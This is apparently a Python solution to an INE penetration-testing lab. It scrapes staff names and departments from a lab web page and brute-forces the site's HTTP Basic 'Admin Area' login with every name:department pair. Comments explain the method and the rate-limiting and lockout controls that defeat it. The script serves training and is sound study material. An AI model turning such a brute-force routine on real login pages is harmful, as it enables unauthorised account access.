Created
February 15, 2021 23:02
My solution to the INE Penetration Testing Python Lab
"""
This script collects names and department info from the target URL and
uses them to brute-force the "Admin Area" login page.
The lab can be found in INE's Penetration Testing Student course: https://my.ine.com/
"""
from bs4 import BeautifulSoup | |
import requests | |
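def get_html(url):
    """
    Fetch `url` with an HTTP GET and return the response body as text.

    The body is returned whatever the HTTP status code is; the status is
    not checked here. Raises `requests.exceptions.RequestException`
    (including `Timeout`) if the request cannot be completed.
    """
    # requests applies no timeout by default, so an unresponsive host would
    # otherwise block the script indefinitely.
    response = requests.get(url, timeout=10)
    return response.text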
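def parse_ids(html, id_name):
    """
    Given HTML code, returns a list of values that have the id `id_name`.

    Each value is the first child node of an element whose `id` attribute
    equals `id_name`. Elements with no children are skipped. Duplicates are
    removed and the remaining values keep the order in which they first
    appear in the document.
    """
    soup = BeautifulSoup(html, "html.parser")
    values = [
        element.contents[0]
        for element in soup.find_all(id=id_name)
        if element.contents  # an empty element has no first child to read
    ]
    # dict.fromkeys removes duplicate entries but, unlike set(), keeps the
    # first-seen order, so the result is the same on every run.
    return list(dict.fromkeys(values))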
def attack():
    """
    Try every scraped name:department pair against the lab's "Admin Area".

    The landing page is fetched once, the values of the elements with ids
    "name" and "department" are extracted, and each combination is sent to
    admin.php as a username/password pair. The first pair whose response is
    not a 401 is printed and the function returns. Nothing is printed when
    no pair is accepted.
    """
    # Both candidate lists come from data the site itself publishes.
    page = get_html("http://172.16.120.120")
    target = "http://172.16.120.120/admin.php"
    names = parse_ids(page, "name")
    departments = parse_ids(page, "department")

    # Same order as a nested loop: every department for the first name, then
    # every department for the second name, and so on.
    credential_pairs = ((n, d) for n in names for d in departments)

    for name, department in credential_pairs:
        # auth=(user, password) makes requests send HTTP Basic credentials;
        # over plain http:// they cross the network base64-encoded, not
        # encrypted.
        reply = requests.get(target, auth=(name, department))

        # NOTE(review): any status other than 401 is reported as a hit, so a
        # 403, 429 or 5xx answer would also be printed as a successful login.
        # Confirm against the responses the lab server actually gives.
        if reply.status_code == 401:
            continue

        print(f"Found successful login {name}:{department}")
        return
    # Server-side view: up to len(names) * len(departments) Basic-auth
    # requests to admin.php from a single client, nearly all answered 401.
    # Lockout or rate limiting on repeated 401s, and credentials that are
    # not derived from published data, are the controls that stop this.
# Run the lab routine only when this file is executed as a script, not when
# it is imported as a module.
if __name__ == "__main__":
    attack()